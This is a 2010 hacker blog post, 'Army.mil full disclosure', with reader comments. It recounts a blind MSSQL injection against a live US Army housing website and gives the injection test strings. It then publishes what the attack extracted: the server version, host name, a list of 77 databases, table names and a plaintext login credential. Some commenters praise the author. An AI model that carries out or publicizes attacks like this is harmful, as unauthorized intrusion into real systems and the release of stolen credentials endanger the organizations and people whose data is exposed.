Army.mil full disclosure
January 7th, 2010 TinKode Posted in Blind SQL Injection | 11 Comments »
/\ (_) |
/ \ _ __ _ __ ___ _ _ _ __ ___ _| |
/ /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
/ ____ \| | | | | | | | |_| |_| | | | | | | |
/_/ \_\_| |_| |_| |_|\__, (_)_| |_| |_|_|_|
__/ |
|___/
The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil
This website is vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.
Testing:
and 1=1– (True)
and 1=2– (False)
Ok, in this picture we can see all main informations about webserver.
Main information:
#Version: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
#User: Dynatouch
#Database: AHOS
#Host Name: AHSGSVDAHQIT130
All databases:
[0] AHOS
[1] master
[2] tempdb
[3] model
[4] msdb
[5] AHOS
[6] AHIT_WEB
[7] AHOS_HQD
[8] AHOS_WL
[9] HEAT
[10] REF_DB
[11] ReportDB
[12] USAREUR_TEST
[13] YARDI_CONV
[14] HOMES_IFS
[15] HOMES_CDB_USAREUR
[16] HOMES_WHSE
[17] HUACFSDIS102148
[18] PINEA4CASTLE
[19] HOMES_CDB
[20] GFOQ_Development
[21] ARTI02036THS003
[22] BISM5843235S301
[23] CDAR0413DPWS001
[24] CHAB000639BS002
[25] FRSA1050WHDS212
[26] GGDE0032284S005
[27] GRAF0244HOUS001
[28] HDCS3980WHDS204
[29] Spotlight
[30] LEDW0003SWFS002
[31] LEDW0252GSWS003
[32] NHQA4106WDAS101
[33] PANS2913GSTS001
[34] PION0011414S601
[35] SEMI0022DPWS002
[36] SULL0255WMAS001
[37] VCAM0107HOUS001
[38] WARN7114279S003
[39] WETZ8876222S210
[40] WIAF1023221S001
[41] LEDW0252GSWS001
[42] BUCHAHOMES01
[43] CASEA4KORHOU068
[44] GREE305APDPW001
[45] HNRYA4KOA4HG086
[46] HUMPA1KODPWH014
[47] RICH123A0PHO001
[48] SCHOU01A4DPWHMS
[49] TORIDPWA4177105
[50] WAIN224DB003153
[51] YONGA4KODPHD995
[52] ZAMADPWA0067011
[53] ANADA1HOMES
[54] APGRA0GAG-HOMES
[55] BENNA0I32214251
[56] BLISSVDPW1HS001
[57] BRAGA4PWAJ18145
[58] CARSDPWXAPS0002
[59] DAEN3104WKLS005
[60] DAMIAP06
[61] DIXXAPRDPW00001
[62] DRUMA001VA11202
[63] DUGWITA4HOMES
[64] EUSTDB13HOMES01
[65] FS-HOMES01
[66] FTBELVOIR_S001
[67] GAHSGHOMES
[68] GORDDBRCP001
[69] HAMIA1206DPW008
[70] HAWTA0HOMES
[71] HIALA0KOA4HG170
[72] HOODA0DPWSYS003
[73] IRWIIMA0HOMES3
[74] JACKDLEHOMES
[75] KNOXDBOSNT2
[76] KS-HSG-HOMES
We can access information_schema, so let’s see the tables from principal database “AHOS”
[0] comd_list
[1] dtproperties
[2] Faqs
[3] Faqs_Categories
[4] Forms
[5] forms_base
[6] gBase
[7] gBase_OLD
[8] gCountries
[9] gHousing_offices
[10] gHousing_offices-old
[11] gStates
[12] Housing_off_post
[13] Housing_phone_qr
[14] mgr_login
[15] mgr_login_OLD
[16] mgr_login_passwords
[17] mgr_login_save
[18] MgrCorner_Configuration
[19] MgrCorner_Configuration_ID
[20] must_know
[21] must_know_cat
[22] Must_know_OLD
[23] sysconstraints
[24] syssegments
[25] UPH
[26] UPH_OLD
[27] uph_photo_text
[28] uph_photo_tours
[29] uph_photos
[30] v_mapview
[31] V_RankView
[32] vHousingAreas
[33] vhqd_vrtours
[34] VIEW_housing
[35] VIEW_phototours
[36] VIEW_vrtours
[37] vMapFiles
[38] vMapOrder
[39] vPhotoFiles
[40] vPlan
[41] vPlanFiles
[42] vRank
[43] vRankDesc
[44] vRankRankDesc
[45] waitlist
[46] waitlist_items
Now, here are some interesting tables, like mgr_login_passwords.
Here i found user : password columns, with :
#Username: Dynatouch
#Password: AHOS
wtf! 
That it’s all! Bye, TinKode…
January 7th, 2010 at 22:13
Initial credeam ca sunt ateu, dar acum cred intr-unul Dumnezeul meu: Tinkode.
))
January 8th, 2010 at 11:10
Social comments and analytics for this post…
This post was mentioned on Twitter by cirrus: RT @TinKode: Army.mil hacked, full disclosure, TinKode http://tinkode.baywords.com/index.php/2010/01/army-mil-full-disclosure/...
January 9th, 2010 at 00:49
Hi sa7bé kifak?
Plz b3atlé email badé hé7ké ma3ak darouré.
merci d’avance.
lalousss
January 9th, 2010 at 20:53
dar acum link-ul nu este accesibil
January 9th, 2010 at 21:06
Evident.. Il repara!
January 11th, 2010 at 03:37
January 11th, 2010 at 04:03
January 12th, 2010 at 21:34
Hey – am researching cybersecurity – can i reach u, or can u reach me? Would like background info.
January 13th, 2010 at 12:04
God job. Please write me letter, I want whatever you have tested your site in the absence of injections.
=)
January 13th, 2010 at 18:08
[...] https://onestop.army.mil/ found vulnerable to SQL Injection. Hacker provides screen shots and notes here. How to perform an SQL Injection Attack can be seen here – Provided for educational purposes [...]
January 18th, 2010 at 05:59
[...] “TinKode,” a Romanian hacker who previously found holes in NASA’s Website, has posted a proof-of-concept on his findings on a SQL injection vulnerability in an Army Website that handles military housing, Army Housing OneStop. TinKode found a hole that leaves the site, which has since been taken offline, vulnerable to a SQL injection attack. “With this vulnerability I can see/extract all things from databases,” he blogged. [...]